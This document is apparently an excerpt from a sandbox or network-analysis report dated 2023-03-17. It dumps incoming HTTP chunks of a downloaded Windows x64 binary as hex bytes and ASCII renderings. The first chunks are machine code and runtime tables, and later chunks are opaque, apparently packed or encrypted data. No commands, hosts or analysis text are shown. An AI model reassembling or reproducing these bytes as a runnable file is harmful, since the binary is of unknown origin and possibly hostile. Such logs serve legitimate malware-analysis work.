                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC16INData Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f
                                                                                                                                                                                                                  Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC24INData Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00
                                                                                                                                                                                                                  Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC32INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC32INData Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b
                                                                                                                                                                                                                  Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC40INData Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d
                                                                                                                                                                                                                  Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC48INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC48INData Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d
                                                                                                                                                                                                                  Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC56INData Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2
                                                                                                                                                                                                                  Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC64INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC64INData Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28
                                                                                                                                                                                                                  Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC72INData Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15
                                                                                                                                                                                                                  Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC80INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC80INData Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff
                                                                                                                                                                                                                  Data Ascii: 4000HD$ tX$$$HD$ a|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC88INData Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: @> ?-DT!?AsAA
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC96INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC96INData Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0
                                                                                                                                                                                                                  Data Ascii: 40000~@P`pX~x~
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC104INData Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c
                                                                                                                                                                                                                  Data Ascii: hVxWXY<v
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC112INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC112INData Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15
                                                                                                                                                                                                                  Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC120INData Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11
                                                                                                                                                                                                                  Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC128INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC128INData Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8
                                                                                                                                                                                                                  Data Ascii: 4000f@|h@@T@zB0|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC136INData Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac
                                                                                                                                                                                                                  Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC144INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC144INData Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30
                                                                                                                                                                                                                  Data Ascii: 4000JRvruq:'8#v}HHMQBFMad>wHDS/Aq=qb0iZ@l{rXa^U?AqkqbAQP9{- Z"Xadwf<Ay85FFX}|oUuDE$>wn7R(.wk?ytu#<r"dad>wfDSAy{b4}[< #1M`kqdu,dM8T0
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC152INData Raw: 61 47 0c da 74 4f 55 71 b6 6f 55 4a 09 ce b0 e4 72 78 3c 11 b5 2c 14 01 b9 23 bc 48 33 a5 ee d8 66 64 35 9c 41 26 45 bc c9 8b 2f 6b 65 81 b6 a3 f9 ea 0d c8 fe 83 90 b9 d6 5f b5 fd e8 26 51 42 b5 cd eb 65 6b 00 58 9d 35 7a d2 a3 9d 30 44 53 17 a5 65 39 be 9e a9 65 41 43 21 91 72 78 fb 1d 18 38 84 4d 51 42 b5 3c 17 32 86 6e b7 ff b4 0e 77 76 e3 61 9f c8 ef ee 8d 3e 3f 2b 2c 87 41 43 b4 f1 99 7f 3c 59 73 2c cf de 90 e7 dc 4f 33 62 64 81 d4 8c 32 7a 53 ad 0b ed 50 94 ad 8b 62 39 3f b3 b1 62 41 c2 80 94 76 78 3c dc da bb b5 a0 d4 a2 33 48 33 a8 02 00 61 e5 80 9a 54 26 45 64 3d 8d ad e0 e0 d9 38 2b 71 26 ca c6 dd 73 71 78 b7 0d 18 38 bb ac 89 45 34 48 ba 26 4f 20 89 3b 03 7a 53 9e 52 77 44 53 c1 0d 98 c6 c0 ec f4 ba 46 43 35 74 b1 78 3c e1 35 a3 0d ac da cf ec
                                                                                                                                                                                                                  Data Ascii: aGtOUqoUJrx<,#H3fd5A&E/ke_&QBekX5z0DSe9eAC!rx8MQB<2nwva>?+,AC<Ys,O3bd2zSPb9?bAvx<3H3aT&Ed=8+q&sqx8E4H&O ;zSRwDSFC5tx<5
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC160INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC160INData Raw: 34 30 30 30 0d 0a 57 46 1f 04 0a 20 11 0e 17 af 01 13 30 eb 0d 22 f7 1d be 5f 55 16 59 9f cb be b6 3c 18 29 f2 99 30 21 da 0e 10 38 c4 83 40 ca b0 8d 36 b0 92 cf 47 be 08 77 58 ea 29 1d 4f 44 04 4c c9 c2 41 50 01 16 a8 70 b4 af 75 49 89 d8 34 48 f2 0f 03 02 e0 11 5d 16 1b c3 28 b6 01 3b 4f d2 9a c6 be 5e 19 cc 39 a8 58 b3 34 18 e3 92 3c 68 f1 44 31 4b f5 25 53 68 00 45 01 3b bc 3f 33 e7 20 57 40 d2 5d 0b 85 5e 6f 29 fa 27 21 07 be 31 19 f3 68 7d 4c e3 7c 05 25 cb 70 6c 13 8a f5 16 61 64 f2 3f 3b 55 20 37 44 eb 2d 2a 75 3d b4 66 19 2e ca 8c c2 95 5a b2 ed b0 3f a2 f1 c8 57 cb 79 20 f2 0f 03 09 a0 01 5d 7e 92 43 2d 35 c5 26 40 6e 20 39 3f ec 34 02 20 b0 35 74 1a 3d 5c 14 b5 2d 50 a0 24 22 cd e5 2f 2c ea 45 01 8c bd 85 ac a7 00 57 8e 73 d7 94 e4 4c 5f 3f 93
                                                                                                                                                                                                                  Data Ascii: 4000WF 0"_UY<)0!8@6GwX)ODLAPpuI4H](;O^9X4<hD1K%ShE;?3 W@]^o)'!1h}L|%plad?;U 7D-*u=f.Z?Wy ]~C-5&@n 9?4 5t=\-P$"/,EWsL_?
                                                                                                                                                                                                                  2023-03-17 08:20:09 UTC168INData Raw: 92 d8 14 e1 a0 8b 42 89 f4 9d 74 f1 70 7d 0c e9 7c 05 61 2d 95 2e 8f e3 1f 24 51 49 c7 10 ef ad 01 13 74 da 6c 4f 55 b2 73 0f 39 e9 45 67 06 bc 30 f1 75 5d fb 2c 14 11 08 43 34 48 f2 06 4f 30 62 e5 71 5e 63 db d5 37 44 d2 5c 4f 55 be e3 27 71 e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 16 10 58 ba 2e 4f 08 34 2c be 96 1b a5 a9 47 83 16 f0 de ac 39 3f 18 b1 2a c8 06 e9 fd 34 9c fb 1c 24 38 45 21 51 c3 71 50 e2 0f 6b 00 ea 21 2d f7 5f 66 46 fe cd 1e 30 00 20 21 64 a2 34 7a c0 06 2d 1b d9 78 3c d8 49 70 44 5e 2b a4 bf 0d 2b eb 2e ec a6 21 2d ae 40 26 45 f6 29 4b 24 ea 20 21 15 81 8e 9d c0 06 2d 54 6e 87 c3 d2 79 70 bd 2d 11 83 d5 4b ba 2f 73 81 14 7c 92 d2 09 55 ce 72 5c da 6d 93 a2 7c 27 26 10 62 41 c2 40 6c eb 3d 56 4d b7 25 28 99 